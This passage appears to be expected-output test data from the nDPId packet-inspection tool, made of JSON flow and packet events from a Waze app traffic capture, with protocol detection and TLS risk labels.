Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":200,"content_type":"application\/octet-stream","user_agent":"Android"}} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871656,"flow_last_seen":1435587871656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871656,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1435587871656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871656,"pkt":"ABoRAAACABoRAAABCABFAAA8\/jRAAEAGF+wKCAABNubjrLHiAFBcJZMGAAAAAKAC\/\/8UywAAAgQFtAQCCAoACG0yAAAAAAEDAwg="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1435587871657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871657,"pkt":"ABoRAAACABoRAAABCABFAAAodJ1AABAG0Zc25uOsCggAAQBQseKj2mz5XCWTB1AS\/\/\/ZAwAA"} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1435587871657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871657,"pkt":"ABoRAAACABoRAAABCABFAAAo\/jVAAEAGF\/8KCAABNubjrLHiAFBcJZMHo9ps+lAQ\/\/\/ZBAAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871658,"flow_last_seen":1435587871658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871658,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1435587871658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871658,"pkt":"ABoRAAACABoRAAABCABFAAA8NxhAAEAG3wgKCAABNubjrLHkAFDBi1oqAAAAAKAC\/\/\/oPgAAAgQFtAQCCAoACG0yAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1435587871659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871659,"pkt":"ABoRAAACABoRAAABCABFAAAodJ5AABAG0ZY25uOsCggAAQBQseQ+dKXVwYtaK1AS\/\/\/ZAQAA"} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1435587871660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871660,"pkt":"ABoRAAACABoRAAABCABFAAAoNxlAAEAG3xsKCAABNubjrLHkAFDBi1orPnSl1lAQ\/\/\/ZAgAA"} -00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871656,"flow_last_seen":1435587871689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871689,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":108,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871656,"flow_last_seen":1435587871690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
-00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871918,"flow_last_seen":1435587871918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871918,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1435587871918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871918,"pkt":"ABoRAAACABoRAAABCABFAAA8cIlAAEAGqJ4KCAABsCJnacdpAbv69x3BAAAAAKAC\/\/\/XPAAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1435587871929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871929,"pkt":"ABoRAAACABoRAAABCABFAAAodKhAABAG1JOwImdpCggAAQG7x2kFCOI++vcdwlAS\/\/\/FGAAA"} 
-00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871929,"flow_last_seen":1435587871929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871929,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1435587871929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871929,"pkt":"ABoRAAACABoRAAABCABFAAA8KgBAAEAG7ycKCAABsCJnacdqAbskTkdIAAAAAKAC\/\/+EXgAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1435587871932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871932,"pkt":"ABoRAAACABoRAAABCABFAAAodKlAABAG1JKwImdpCggAAQG7x2rbsbi3JE5HSVAS\/\/\/FFwAA"} 
-00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871935,"flow_last_seen":1435587871935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1435587871935,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871935,"pkt":"ABoRAAACABoRAAABCABFAAA8\/WxAAEAGG7sKCAABsCJnacdrAbsTBZAkAAAAAKAC\/\/9MygAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1435587871938,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871938,"pkt":"ABoRAAACABoRAAABCABFAAAodKpAABAG1JGwImdpCggAAQG7x2vs+m\/bEwWQJVAS\/\/\/FFgAA"} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871939,"flow_last_seen":1435587871939,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871939,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1435587871939,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871939,"pkt":"ABoRAAACABoRAAABCABFAAA8xDRAAEAGxZIKCAABNBFy25hiAbudWal8AAAAAKAC\/\/9IxgAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1435587871941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871941,"pkt":"ABoRAAACABoRAAABCABFAAAodKtAABAGRTA0EXLbCggAAQG7mGJiplaDnVmpfVAS\/\/9kvwAA"} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871941,"flow_last_seen":1435587871941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871941,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1435587871941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871941,"pkt":"ABoRAAACABoRAAABCABFAAA8RGdAAEAG0bkKCAABNubjrLHqAFALhykvAAAAAKAC\/\/\/PIgAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1435587871943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871943,"pkt":"ABoRAAACABoRAAABCABFAAAodKxAABAG0Yg25uOsCggAAQBQser0eNbQC4cpMFAS\/\/\/Y+wAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAocIpAAEAGqLEKCAABsCJnacdpAbv69x3CBQjiP1AQ\/\/\/FGQAA"} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoKgFAAEAG7zoKCAABsCJnacdqAbskTkdJ27G4uFAQ\/\/\/FGAAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAo\/W1AAEAGG84KCAABsCJnacdrAbsTBZAl7Ppv3FAQ\/\/\/FFwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoxDVAAEAGxaUKCAABNBFy25hiAbudWal9YqZWhFAQ\/\/9kwAAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoRGhAAEAG0cwKCAABNubjrLHqAFALhykw9HjW0VAQ\/\/\/Y\/AAA"} 
-00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871918,"flow_last_seen":1435587872045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872045,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871929,"flow_last_seen":1435587872139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872139,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871935,"flow_last_seen":1435587872205,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872205,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871939,"flow_last_seen":1435587872289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872289,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871941,"flow_last_seen":1435587872340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587872340,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871941,"flow_last_seen":1435587872341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587872341,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872476,"flow_last_seen":1435587872476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587872476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1435587872476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587872476,"pkt":"ABoRAAACABoRAAABCABFAAA8WSJAAEAGvP4KCAABNubjrLHwAFDxQTSmAAAAAKAC\/\/\/drgAAAgQFtAQCCAoACG2EAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1435587872477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872477,"pkt":"ABoRAAACABoRAAABCABFAAAodLxAABAG0Xg25uOsCggAAQBQsfAOvstZ8UE0p1AS\/\/\/Y9QAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1435587872478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872478,"pkt":"ABoRAAACABoRAAABCABFAAAoWSNAAEAGvREKCAABNubjrLHwAFDxQTSnDr7LWlAQ\/\/\/Y9gAA"} 
-00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 